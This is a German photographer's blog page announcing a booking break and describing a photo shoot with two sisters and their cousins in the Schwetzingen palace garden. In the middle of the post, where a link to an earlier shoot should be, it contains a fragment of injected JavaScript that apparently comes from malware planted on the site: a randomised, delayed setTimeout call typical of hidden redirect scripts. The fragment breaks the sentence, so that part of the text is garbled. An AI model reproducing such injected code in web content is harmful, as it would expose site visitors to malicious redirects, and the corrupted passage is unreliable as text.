Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Geschwister & Cousinenshooting | Schloßgarten Schwetzingen

Hallo zusammen,

nachdem am Sonntag die Sonne schien & es perfektes Shootingwetter bot, mag man heute erst gar nicht aus dem Fenster schauen. Diese ist heute wieder hinter einer großen, dicken Wolkendecke versteckt. Wo bleibt der Frühling? Ende März und die Bäume sind noch kahl. Nichts blüht und somit heißt es weiterhin warten auf die Frühlingstemeraturen & Blühtenwelt. Perfekt für einen neuen Blogbeitrag um dem tristen Wetter einen Moment zu entfliehen. Es freut mich so, dass ich zum zweiten Mal die Geschwister Kristina & Katrin vor meiner Linse hatte. Ihr erstes Shooting war im Winter 2012 bei eisigen Temperaturen & Schnee (dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and/“ target=“_blank“>siehe hier). Bei unserem aktuellen Shooting mit den Cousinen Melanie & Nadine, blieben wir von Schnee  & Minusgraden verschont & wir durften die Sonne begrüßen. Diese erhellte alle Gemüter & die gute Laune & die milden Sonnenstrahlen taten richtig gut. Ich hoffe, dass der Frühling und damit verbundene blühtenreiche Natur uns ganz bald erreicht. Ich wünsche viel Spaß beim Anschauen der Serie.

Ich liebe solche Momente so sehr ♥

Keine Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

Menu